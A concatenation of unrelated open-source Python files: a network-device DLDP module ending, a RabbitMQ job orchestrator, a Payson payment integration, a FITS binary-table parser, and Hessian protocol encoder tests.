self.get_end_state() self.show_result() def main(): """Main function entry""" argument_spec = dict( enable=dict(choices=['enable', 'disable'], type='str'), work_mode=dict(choices=['enhance', 'normal'], type='str'), time_interval=dict(type='str'), reset=dict(choices=['enable', 'disable'], type='str'), auth_mode=dict(choices=['md5', 'simple', 'sha', 'hmac-sha256', 'none'], type='str'), auth_pwd=dict(type='str', no_log=True), ) argument_spec.update(ce_argument_spec) dldp_obj = Dldp(argument_spec) dldp_obj.work() if __name__ == '__main__': main() <filename>scripts/orchestrator.py<gh_stars>1-10 #!/usr/bin/env python from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import from builtins import open from builtins import str from future import standard_library standard_library.install_aliases() import os import sys import re import json import logging import time import socket import uuid import pprint from datetime import datetime import pika from mozart import app from pikaUtils import pika_callback log_format = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) ' '-35s %(lineno) -5d: %(message)s') logging.basicConfig(level=logging.INFO, format=log_format) logger = logging.getLogger('orchestrator') logger.setLevel(logging.INFO) def getTimestamp(fraction=True): """Return the current date and time formatted for a message header.""" (year, month, day, hh, mm, ss, wd, y, z) = time.gmtime() d = datetime.utcnow() if fraction: s = "%04d%02d%02dT%02d%02d%02d.%dZ" % (d.year, d.month, d.day, d.hour, d.minute, d.second, d.microsecond) else: s = "%04d%02d%02dT%02d%02d%02dZ" % (d.year, d.month, d.day, d.hour, d.minute, d.second) return s def getFunction(funcStr, addToSysPath=None): """Automatically parse a function call string to import any libraries and return a pointer to the function. Define addToSysPath to prepend a path to the modules path.""" # check if we have to import a module libmatch = re.match(r'^((?:\w|\.)+)\.\w+\(?.*$', funcStr) if libmatch: importLib = libmatch.group(1) if addToSysPath: exec("import sys; sys.path.insert(1,'%s')" % addToSysPath) exec("import %s" % importLib) exec("reload(%s)" % importLib) # check there are args argsMatch = re.search(r'\((\w+)\..+\)$', funcStr) if argsMatch: importLib2 = argsMatch.group(1) if addToSysPath: exec("import sys; sys.path.insert(1,'%s')" % addToSysPath) exec("import %s" % importLib2) exec("reload(%s)" % importLib2) # return function return eval(funcStr) def getJobId(job_name): """Return a mozart job id.""" return '%s-%s' % (job_name, getTimestamp()) class OrchestratorClient(object): def __init__(self, connection, config, job_name, job_json, queue_name): self._connection = connection self._channel = None self._config = config self._job_json = job_json self._queue_name = queue_name self._response = {'status': None, 'job_id': None} self._callback_queue = None self._corr_id = None # get descriptive job name if 'name' in self._job_json: self._job_name = self._job_json['name'] else: self._job_name = job_name logger.info("config: %s" % self._config) def on_response(self, ch, method, props, body): """Handle response from worker.""" logger.info("on_response was called with body: %s" % body) logger.info("on_response was called with props: %s" % props) if self._corr_id == props.correlation_id: self._response = json.loads(body) logger.info("set self._response to: %s" % pprint.pformat(self._response)) if self._response['status'] in ('job-completed', 'job-failed'): # move to completed or error queue if self._response['status'] == 'job-completed': routing_key = self._config['job_completed_queue'] else: routing_key = self._config['job_error_queue'] self._channel.basic_publish(exchange='', routing_key=routing_key, body=body, properties=pika.BasicProperties( delivery_mode=2 # make message persistent ) ) self._channel.close() logger.info("closed channel to temp queue: %s" % self._callback_queue) def on_queue_declared(self, frame): """Set response handler then submit the job.""" self._callback_queue = frame.method.queue self._channel.basic_consume(self.on_response, no_ack=True, queue=self._callback_queue) # set job id self._job_json['job_id'] = getJobId(self._job_name) # set job_info time_queued = datetime.utcnow() self._job_json['job_info'] = { 'id': self._job_json['job_id'], 'job_queue': self._queue_name, 'completed_queue': self._config['job_completed_queue'], 'error_queue': self._config['job_error_queue'], 'job_status_exchange': self._config['job_status_exchange'], 'time_queued': time_queued.isoformat() + 'Z' } body = json.dumps(self._job_json) self._response['job_id'] = self._job_json['job_id'] self._corr_id = self._job_json['job_id'] self._channel.basic_publish(exchange='', routing_key=self._queue_name, body=body, properties=pika.BasicProperties( reply_to=self._callback_queue, correlation_id=self._corr_id, delivery_mode=2, # make message persistent )) # set status self._channel.basic_publish(exchange=self._config['job_status_exchange'], routing_key='', body=json.dumps({'job_id': self._job_json['job_id'], 'status': 'job-queued', 'timestamp': datetime.utcnow().isoformat() + 'Z', 'job': self._job_json}), properties=pika.BasicProperties( reply_to=self._callback_queue, correlation_id=self._corr_id, delivery_mode=2, # make message persistent )) def on_channel_open(self, channel): """Declare temporary anonymous queue for worker response.""" self._channel = channel self._channel.queue_declare(self.on_jobqueue_declared, self._queue_name, durable=True) def on_jobqueue_declared(self, frame): """Set response handler then submit the job.""" self._channel.queue_declare(exclusive=True, auto_delete=True, callback=self.on_queue_declared) def queue(self): """Open new channel.""" self._connection.channel(on_open_callback=self.on_channel_open) class Orchestrator(object): """ Based on the ansynchronous consumer example from the pika documentation: https://pika.readthedocs.org/en/latest/examples/asynchronous_consumer_example.html """ def __init__(self, amqp_url, config_file): """Create a new instance of the orchestrator class, passing in the AMQP URL used to connect to RabbitMQ and the json config file. :param str amqp_url: The AMQP url to connect with :param str config_file: The JSON config file """ self._url = amqp_url self._config_file = config_file self._config = json.loads(open(self._config_file).read()) self._exchange = self._config['job_status_exchange'] self._exchange_type = 'fanout' self._job_status_queues = ['job_status_response', 'job_status_log'] #self._routing_key = None self._connection = None self._channel = None self._closing = False self._consumer_tags = {} self._added_cancel_callback = False # parse config file for job configurations self._job_config_dict = {} for config in self._config['configs']: self._job_config_dict[config['job_type']] = config['job_creators'] logger.info("Starting up orchestrator using %s." % self._config_file) # append job_creators dir self._job_creators_dir = os.path.normpath( os.path.join(app.root_path, '..', 'scripts', 'job_creators' ) ) logger.info("Job creators directory: %s." % self._job_creators_dir) def create_job_callback(self, channel, method, properties, body): """Callback to handle job creation.""" # self.acknowledge_message(method.delivery_tag) logger.info('Received message # %s from %s: %s', method.delivery_tag, properties.app_id, body) # check that we have info to create jobs j = json.loads(body) if 'job_type' not in j: raise RuntimeError("Invalid job spec. No 'job_type' specified.") job_type = j['job_type'] if 'payload' not in j: raise RuntimeError("Invalid job spec. No 'payload' specified.") payload = j['payload'] logger.info("got job_type: %s" % job_type) logger.info("payload: %s" % payload) # check that we know handle to handle this job type if job_type not in self._job_config_dict: logger.info("No job configuration info for '%s'." % job_type) raise RuntimeError( "No job configuration info for '%s'." % job_type) # get job json and add to queues for jc in self._job_config_dict[job_type]: func = getFunction( jc['function'], addToSysPath=self._job_creators_dir) job = func(payload) logger.info("job_json: %s" % job) for queue in jc['job_queues']: self.queue_job(jc['job_name'], job, queue) def queue_job(self, job_name, job, queue): """Queue job.""" orc_client = OrchestratorClient( self._connection, self._config, job_name, job, queue) orc_client.queue() logger.info("added job_json to %s" % queue) def connect(self): """This method connects to RabbitMQ, returning the connection handle. When the connection is established, the on_connection_open method will be invoked by pika. :rtype: pika.SelectConnection """ logger.info('Connecting to %s', self._url) return pika.SelectConnection(pika.URLParameters(self._url), self.on_connection_open, stop_ioloop_on_close=False) def close_connection(self): """This method closes the connection to RabbitMQ.""" logger.info('Closing connection') self._connection.close() def add_on_connection_close_callback(self): """This method adds an on close callback that will be invoked by pika when RabbitMQ closes the connection to the publisher unexpectedly. """ logger.info('Adding connection close callback') self._connection.add_on_close_callback(self.on_connection_closed) def on_connection_closed(self, connection, reply_code, reply_text): """This method is invoked by pika when the connection to RabbitMQ is closed unexpectedly. Since it is unexpected, we will reconnect to RabbitMQ if it disconnects. :param pika.frame.Method frame: The method frame from RabbitMQ """ if self._closing: self._connection.ioloop.stop() else: logger.warning('Server closed connection, reopening: (%s) %s', reply_code, reply_text) self._connection.add_timeout(5, self.reconnect) def on_connection_open(self, unused_connection): """This method is called by pika once the connection to RabbitMQ has been established. It passes the handle to the connection object in case we need it, but in this case, we'll just mark it unused. :type unused_connection: pika.SelectConnection """ logger.info('Connection opened') self.add_on_connection_close_callback() self.open_channel() def reconnect(self): """Will be invoked by the IOLoop timer if the connection is closed. See the on_connection_closed method. """ # This is the old connection IOLoop instance, stop its ioloop self._connection.ioloop.stop() if not self._closing: # Create a new connection self._connection = self.connect() # There is now a new connection, needs a new ioloop to run self._connection.ioloop.start() def add_on_channel_close_callback(self): """This method tells pika to call the on_channel_closed method if RabbitMQ unexpectedly closes the channel. """ logger.info('Adding channel close callback') self._channel.add_on_close_callback(self.on_channel_closed) def on_channel_closed(self, channel, reply_code, reply_text): """Invoked by pika when RabbitMQ unexpectedly closes the channel. Channels are usually closed if you attempt to do something that violates the protocol, such as redeclare an exchange or queue with different paramters. In this case, we'll close the connection to shutdown the object. :param pika.frame.Method frame: The Channel.Close method frame """ logger.warning('Channel was closed: (%s) %s', reply_code, reply_text) self._connection.close() def on_channel_open(self, channel): """This method is invoked by pika when the channel has been opened. The channel object is passed in so we can make use of it. Since the channel is now open, we'll declare the exchange to use. :param pika.channel.Channel channel: The channel object """ logger.info('Channel opened') self._channel = channel self.add_on_channel_close_callback() self.setup_exchange(self._exchange, self._exchange_type) def setup_exchange(self, exchange_name, exchange_type): """Setup the exchange on RabbitMQ by invoking the Exchange.Declare RPC command. When it is complete, the on_exchange_declareok method will be invoked by pika. :param str|unicode exchange_name: The name of the exchange to declare """ logger.info('Declaring exchange %s of type %s', exchange_name, exchange_type) self._channel.exchange_declare(self.on_exchange_declareok, exchange_name, exchange_type, durable=True) def on_exchange_declareok(self, frame): """Invoked by pika when RabbitMQ has finished the Exchange.Declare RPC command. :param pika.Frame.Method frame: Exchange.DeclareOk response frame """ logger.info('Exchange declared') # setup completed and error queues self.setup_queue_no_cb(self._config['job_completed_queue']) self.setup_queue_no_cb(self._config['job_error_queue']) # setup job status queues for queue in self._job_status_queues: self.setup_status_queue(queue) # setup job worker queues for queue in self._config['queues']: self.setup_queue(queue) def setup_queue_no_cb(self, queue_name): logger.info('Declaring queue %s', queue_name) self._channel.queue_declare(None, queue_name, durable=True) def setup_status_queue(self, queue_name): """Setup the queue on RabbitMQ by invoking the Queue.Declare RPC command. When it is complete, the on_queue_declareok method will be invoked by pika. :param str|unicode queue_name: The name of the queue to declare. """ logger.info('Declaring status queue %s', queue_name) self._channel.queue_declare(self.on_statusqueue_declareok, queue_name, durable=True) def setup_queue(self, queue_name): """Setup the queue on RabbitMQ by invoking the Queue.Declare RPC command. When it is complete, the on_queue_declareok method will be invoked by pika. :param str|unicode queue_name: The name of the queue to declare. """ logger.info('Declaring queue %s', queue_name) self._channel.queue_declare(self.on_queue_declareok, queue_name, durable=True) def on_queue_declareok(self, frame): """Method invoked by pika when the Queue.Declare RPC call made in setup_queue has completed. In this method we will bind the queue and exchange together with the routing key by issuing the Queue.Bind RPC command. When this command is complete, the on_bindok method will be invoked by pika. :param pika.frame.Method frame: The Queue.DeclareOk frame """ queue = frame.method.queue self.start_consuming(queue) def on_statusqueue_declareok(self, frame): queue = frame.method.queue logger.info('Binding %s to %s' % (self._exchange, queue)) self._channel.queue_bind(self.on_bindok, queue, self._exchange) def add_on_cancel_callback(self): """Add a callback that will be invoked if RabbitMQ cancels the consumer for some reason. If RabbitMQ does cancel the consumer, on_consumer_cancelled will be invoked by pika. """ if not self._added_cancel_callback: logger.info('Adding consumer cancellation callback') self._channel.add_on_cancel_callback(self.on_consumer_cancelled) self._added_cancel_callback = True def on_consumer_cancelled(self, frame): """Invoked by pika when RabbitMQ sends a Basic.Cancel for a consumer receiving messages. :param pika.frame.Method frame: The Basic.Cancel frame """ logger.info('Consumer was cancelled remotely, shutting down: %r', frame) if self._channel: self._channel.close() def acknowledge_message(self, delivery_tag): """Acknowledge the message delivery from RabbitMQ by sending a Basic.Ack RPC method for the delivery tag. :param int delivery_tag: The delivery tag from the Basic.Deliver frame """ self._channel.basic_ack(delivery_tag) logger.info('Acknowledged message %s', delivery_tag) def on_cancelok(self, frame): """This method is invoked by pika when RabbitMQ acknowledges the cancellation of a consumer. At this point we will close the connection which will automatically close the channel if it's open. :param pika.frame.Method frame: The Basic.CancelOk frame """ logger.info('RabbitMQ acknowledged the cancellation of the consumer') self.close_connection() def stop_consuming(self): """Tell RabbitMQ that you would like to stop consuming by sending the Basic.Cancel RPC command. """ if self._channel: logger.info('Sending a Basic.Cancel RPC command to RabbitMQ') for queue in self._consumer_tags: self._channel.basic_cancel( self.on_cancelok, self._consumer_tags[queue]) def start_consuming(self, queue): """This method sets up the consumer by first calling add_on_cancel_callback so that the object is notified if RabbitMQ cancels the consumer. It then issues the Basic.Consume RPC command which returns the consumer tag that is used to uniquely identify the consumer with RabbitMQ. We keep the value to use it when we want to cancel consuming. A wrapped method is passed in as a callback pika will invoke when a message is fully received. """ self.add_on_cancel_callback() callback = pika_callback(queue)(self.create_job_callback) logger.info("Got callback for queue %s: %s" % (queue, callback)) self._consumer_tags[queue] = self._channel.basic_consume( callback, queue=queue) def on_bindok(self, frame): """Invoked by pika when the Queue.Bind method has completed. At this point we will start consuming messages by calling start_consuming which will invoke the needed RPC commands to start the process. :param pika.frame.Method frame: The Queue.BindOk response frame """ logger.info('Queue bound') def close_channel(self): """Call to close the channel with RabbitMQ cleanly by issuing the Channel.Close RPC command. """ logger.info('Closing the channel') self._channel.close() def open_channel(self): """Open a new channel with RabbitMQ by issuing the Channel.Open RPC command. When RabbitMQ responds that the channel is open, the on_channel_open callback will be invoked by pika. """ logger.info('Creating a new channel') self._connection.channel(on_open_callback=self.on_channel_open) def run(self): """Run the example consumer by connecting to RabbitMQ and then starting the IOLoop to block and allow the SelectConnection to operate. """ self._connection = self.connect() self._connection.ioloop.start() def stop(self): """Cleanly shutdown the connection to RabbitMQ by stopping the consumer with RabbitMQ. When RabbitMQ confirms the cancellation, on_cancelok will be invoked by pika, which will then closing the channel and connection. The IOLoop is started again because this method is invoked when CTRL-C is pressed raising a KeyboardInterrupt exception. This exception stops the IOLoop which needs to be running for pika to communicate with RabbitMQ. All of the commands issued prior to starting the IOLoop will be buffered but not processed. """ logger.info('Stopping') self._closing = True self.stop_consuming() self._connection.ioloop.start() logger.info('Stopped') def main(): amqp_url = 'amqp://guest:guest@localhost:5672/%2F' config_file = sys.argv[1] # handle rabbitMQ server being down while True: try: orch = Orchestrator(amqp_url, config_file) break except socket.error as e: logger.error("Failed to connect: %s" % str(e)) time.sleep(3) # start event loop try: orch.run() except KeyboardInterrupt: orch.stop() if __name__ == '__main__': main() <reponame>jacob22/accounting # -*- coding: utf-8 -*- from __future__ import absolute_import # Copyright 2019 Open End AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from bson.objectid import ObjectId import decimal import flask try: import httplib #py2 except ImportError: import http.client as httplib #py3 import payson try: import urlparse #py2 from urlparse import urljoin as urljoin import urllib from urllib import urlencode as urlencode except ImportError: from urllib.parse import urlparse #py3 from urllib.parse import urljoin as urljoin from urllib.parse import urlencode as urlencode from accounting import config import members from pytransact.context import ReadonlyContext, maybe_with_context from pytransact.commit import CommitContext, CallToi, CreateToi, wait_for_commit import blm.accounting, blm.members log = config.getLogger('payson') class PaysonError(RuntimeError): pass def pay(database, providerId, purchaseId, returnto): with ReadonlyContext(database) as ctx: provider, = blm.accounting.PaysonProvider._query(id=providerId).run() org = provider.org[0] purchase, = blm.members.BasePurchase._query(id=purchaseId).run() api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) receiver = payson.Receiver(email=provider.receiverEmail[0], amount=purchase.remainingAmount[0]) memo = (u'Betalning till %s' % org.name[0])[:128] ipnBase = (config.config.get('payson', 'ipn_notification_baseurl') or config.config.get('accounting', 'baseurl')) ipnNotificationUrl = urljoin(ipnBase, 'paysonipn') payment_response = api.pay( returnUrl=returnto, cancelUrl=returnto, ipnNotificationUrl=ipnNotificationUrl, memo=memo, senderEmail=purchase.buyerEmail[0], senderFirstName=purchase.buyerName[0].split()[0], senderLastName=purchase.buyerName[0].split()[-1], trackingId=str(purchaseId), custom=str(providerId), receiverList=[receiver] ) if payment_response.success: return flask.redirect(payment_response.forward_pay_url) return '' def payson_ipn(request, database): log.info('IPN request') payData = payson.PaymentDetails(request.values) with ReadonlyContext(database): provider, = blm.accounting.PaysonProvider._query(id=payData.custom).run() api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) requestdata = urlencode(request.form) log.info('Request data: %r', requestdata) if api.validate(requestdata): log.info('IPN Verified') update_payment(payData.token, database, provider=provider) else: log.info('IPN NOT Verified') return '', httplib.NO_CONTENT def update_payment(token, database, purchase=None, provider=None): log.info('Payson update') with ReadonlyContext(database): if blm.members.PaysonPayment._query(token=token).run(): log.info('Payment %s already registered, aborting.', token) return if not provider: purchase, = blm.members.Purchase._query(id=purchase, _attrList=['org']).run() provider = blm.accounting.PaysonProvider._query(org=purchase.org).run()[0] api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) payData = api.payment_details(token) if payData.status == 'COMPLETED': with CommitContext(database) as ctx: purchase, = blm.members.Purchase._query(id=payData.trackingId).run() op = CreateToi('members.PaysonPayment', None, dict( paymentProvider=[provider], matchedPurchase=[purchase], amount=[payData.receiverList[0].amount], purchaseId=[payData.purchaseId], senderEmail=[payData.senderEmail], token=[payData.token], receiverFee=[payData.receiverFee], receiverEmail=[payData.receiverList[0].email], type=[payData.type])) interested = 'payson-%s' % ObjectId() commit = ctx.runCommit([op], interested=interested) result, error = wait_for_commit(database, interested=interested) if error: raise error paymentId = result[0] with CommitContext(database) as ctx: op = CallToi(paymentId, 'sendConfirmationEmail', []) interested = 'send-payson-payment-confirmation-%s' % ObjectId() commit = ctx.runCommit([op], interested=interested) result, error = wait_for_commit(database, interested=interested) if error: raise error @maybe_with_context() def refund(payment): provider = payment.paymentProvider[0] api = payson.PaysonApi(provider.apiUserId[0], provider.apiPassword[0]) if not api.payment_update(payment.token[0], 'REFUND'): raise PaysonError() return True <reponame>wangleon/stella import struct import numpy as np from .memoize import memoized def tform_to_format(tform): """Convert `TFORM` string in FITS binary table to format string in Python `struct` module. Args: tfrom (str): `TFORM` string in FITS binary table. Returns: str: A format string used in Python `struct` module. """ if tform == 'L': return 'b' # 1 byte, boolean if tform == 'B': return 'B' # 1 byte, unsigned byte if tform == 'I': return 'h' # 2 bytes, integer if tform == 'J': return 'i' # 4 bytes, integer if tform == 'K': return 'l' # 8 bytes, integer if tform == 'E': return 'f' # 4 bytes, single-precision float if tform == 'D': return 'd' # 8 bytes, double-precision float if tform == 'C': return '?' # 8 bytes, single-precision complex if tform == 'M': return '?' # 16 bytes, double-precision complex if tform == 'P': return '?' # 8 bytes, 32 bits array descriptor if tform == 'Q': return '?' # 16 bytes, 64 bits array descriptor if tform[-1] == 'A': return tform[0:-1]+'s' # 1 bytes, character def tform_to_dtype(tform): """Convert `TFORM` string in FITS binary table to Numpy dtype. Args: tfrom (str): `TFORM` string in FITS binary table. Returns: :class:`numpy.dtype`: Numpy dtype object. """ if tform == 'L': return np.bool # 1 byte, boolean #if tform == 'B': return 'B' # 1 byte, unsigned byte if tform == 'I': return np.int16 # 2 bytes, integer if tform == 'J': return np.int32 # 4 bytes, integer if tform == 'K': return np.int64 # 8 bytes, integer if tform == 'E': return np.float32 # 4 bytes, single-precision float if tform == 'D': return np.float64 # 8 bytes, double-precision float if tform == 'C': return '?' # 8 bytes, single-precision complex if tform == 'M': return '?' # 16 bytes, double-precision complex if tform == 'P': return '?' # 8 bytes, 32 bits array descriptor if tform == 'Q': return '?' # 16 bytes, 64 bits array descriptor if tform[-1] == 'A': return 'S'+tform[0:-1] # 1 bytes, character @memoized def get_bintable_info(filename, extension=1): """Return the information of the binary table in a given FITS file. Args: filename (str): Name of the input FITS file. extension (int): Extension of the binary table to be read. Returns: tuple: A tuple containing: * **naxis1** (*int*): Length of row in bytes. * **naxis2** (*int*): Number of rows in the table. * **tfields** (*int*): Number of columns in the table. * **position** (*int*): The starting position of the table. * **dtype** (:class:`numpy.dtype`): Numpy dtype of the row. * **fmtfunc** (*function*): Function to format the rows. Examples: .. code-block:: python from stella.utils.fitsio import get_bintable_info nbyte, nrow, ncol, pos, dtype, fmtfunc = get_bintable_info(filename) """ infile = open(filename,'rb') current_hdu = 0 while(True): block = infile.read(36*80) if block[0:8].decode('ascii') == 'XTENSION': current_hdu += 1 if block[10:30].decode('ascii').strip()[1:-1]=='BINTABLE' and \ current_hdu==extension: infile.seek(-36*80,1) #current_position = infile.tell() #infile.seek(current_position-36*80) break count = 0 # read the header of binary table while(True): row = infile.read(80).decode('ascii') count += 1 if row[0:3]=='END': infile.seek((36-count%36)*80,1) break elif row[0:6]=='NAXIS1': naxis1 = int(row[10:30]) elif row[0:6]=='NAXIS2': naxis2 = int(row[10:30]) elif row[0:7]=='TFIELDS': tfields = int(row[10:30]) ttype_lst = ['' for j in range(tfields)] tform_lst = ['' for j in range(tfields)] elif row[0:5]=='TTYPE': index = int(row[5:8]) ttype_lst[index-1] = row[10:30].strip()[1:-1].strip() elif row[0:5]=='TFORM': index = int(row[5:8]) tform_lst[index-1] = row[10:30].strip()[1:-1].strip() else: pass position = infile.tell() infile.close() formats = tuple([tform_to_dtype(v) for v in tform_lst]) record = np.dtype({'names':ttype_lst,'formats':formats}) fmt = '>'+(''.join([tform_to_format(v) for v in tform_lst])) fmtfunc = lambda string: np.array(struct.unpack(fmt, string),dtype=record) return naxis1, naxis2, tfields, position, record, fmtfunc <reponame>chance-nelson/python-hessian import datetime import six from pyhessian import protocol from pyhessian.data_types import long from .base import HessianTestCase # Caucho's Hessian 2.0 reference service # interface: http://caucho.com/resin-javadoc/com/caucho/hessian/test/TestHessian2.html class EncoderTestCase(HessianTestCase): def test_encode_binary_0(self): arg = protocol.Binary(b"") response = self.client.argBinary_0(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_1(self): arg = protocol.Binary(b"0") response = self.client.argBinary_1(arg) self.assertEqual(response, True, "Debug response: %s" % response) def get_arg_str_1024(self): arg_str = "" for i in range(0, 16): arg_str += "%d%d%s" % ( i // 10, i % 10, " 456789012345678901234567890123456789012345678901234567890123\n") return arg_str[:1024] def get_arg_str_65536(self): arg_str = "" for i in range(0, 64 * 16): arg_str += "%d%d%d%s" % ( i // 100, (i // 10) % 10, i % 10, " 56789012345678901234567890123456789012345678901234567890123\n") return arg_str[:65536] def test_encode_binary_1023(self): arg = protocol.Binary(six.b(self.get_arg_str_1024()[:1023])) response = self.client.argBinary_1023(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_1024(self): arg = protocol.Binary(six.b(self.get_arg_str_1024()[:1024])) response = self.client.argBinary_1024(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_15(self): response = self.client.argBinary_15(protocol.Binary(b"012345678901234")) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_16(self): response = self.client.argBinary_16(protocol.Binary(b"0123456789012345")) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_binary_65536(self): arg = protocol.Binary(six.b(self.get_arg_str_65536())) response = self.client.argBinary_65536(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_date_0(self): arg = datetime.datetime.utcfromtimestamp(0) response = self.client.argDate_0(arg) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_date_1(self): response = self.client.argDate_1(datetime.datetime(1998, 5, 8, 9, 51, 31)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_date_2(self): response = self.client.argDate_2(datetime.datetime(1998, 5, 8, 9, 51, 0)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_0_0(self): response = self.client.argDouble_0_0(0.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_0_001(self): response = self.client.argDouble_0_001(0.001) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_1_0(self): response = self.client.argDouble_1_0(1.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_127_0(self): response = self.client.argDouble_127_0(127.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_128_0(self): response = self.client.argDouble_128_0(128.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_2_0(self): response = self.client.argDouble_2_0(2.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_3_14159(self): response = self.client.argDouble_3_14159(3.14159) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_32767_0(self): response = self.client.argDouble_32767_0(32767.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_65_536(self): response = self.client.argDouble_65_536(65.536) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m0_001(self): response = self.client.argDouble_m0_001(-0.001) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m128_0(self): response = self.client.argDouble_m128_0(-128.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m129_0(self): response = self.client.argDouble_m129_0(-129.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_double_m32768_0(self): response = self.client.argDouble_m32768_0(-32768.0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_false(self): result = self.client.argFalse(False) self.assertEqual(True, result, result) def test_encode_int_0(self): response = self.client.argInt_0(0) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x30(self): response = self.client.argInt_0x30(0x30) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x3ffff(self): response = self.client.argInt_0x3ffff(0x3ffff) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x40000(self): response = self.client.argInt_0x40000(0x40000) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x7ff(self): response = self.client.argInt_0x7ff(0x7ff) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x7fffffff(self): response = self.client.argInt_0x7fffffff(0x7fffffff) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_0x800(self): response = self.client.argInt_0x800(0x800) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_1(self): response = self.client.argInt_1(1) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_47(self): response = self.client.argInt_47(47) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x40000(self): response = self.client.argInt_m0x40000(-0x40000) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x40001(self): response = self.client.argInt_m0x40001(-0x40001) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x800(self): response = self.client.argInt_m0x800(-0x800) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x80000000(self): response = self.client.argInt_m0x80000000(-0x80000000) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m0x801(self): response = self.client.argInt_m0x801(-0x801) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m16(self): response = self.client.argInt_m16(-16) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_int_m17(self): response = self.client.argInt_m17(-17) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0(self): response = self.client.argLong_0(long(0)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x10(self): response = self.client.argLong_0x10(long(0x10)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x3ffff(self): response = self.client.argLong_0x3ffff(long(0x3ffff)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x40000(self): response = self.client.argLong_0x40000(long(0x40000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x7ff(self): response = self.client.argLong_0x7ff(long(0x7ff)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x7fffffff(self): response = self.client.argLong_0x7fffffff(long(0x7fffffff)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x800(self): response = self.client.argLong_0x800(long(0x800)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_0x80000000(self): response = self.client.argLong_0x80000000(long(0x80000000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_1(self): response = self.client.argLong_1(long(1)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_15(self): response = self.client.argLong_15(long(15)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x40000(self): response = self.client.argLong_m0x40000(long(-0x40000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x40001(self): response = self.client.argLong_m0x40001(long(-0x40001)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x800(self): response = self.client.argLong_m0x800(long(-0x800)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x80000000(self): response = self.client.argLong_m0x80000000(long(-0x80000000)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x80000001(self): response = self.client.argLong_m0x80000001(long(-0x80000001)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m0x801(self): response = self.client.argLong_m0x801(long(-0x801)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m8(self): response = self.client.argLong_m8(long(-8)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_long_m9(self): response = self.client.argLong_m9(long(-9)) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_null(self): response = self.client.argNull(None) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_0(self): payload = protocol.object_factory('com.caucho.hessian.test.A0') response = self.client.argObject_0(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_1(self): payload = protocol.object_factory('com.caucho.hessian.test.TestObject', _value=0) response = self.client.argObject_1(payload) self.assertEqual(response, True, "Debug response: %s" % response) def test_encode_object_16(self): payload = [ protocol.object_factory('com.caucho.hessian.test.A0'), protocol.object_factory('com.caucho.hessian.test.A1'), 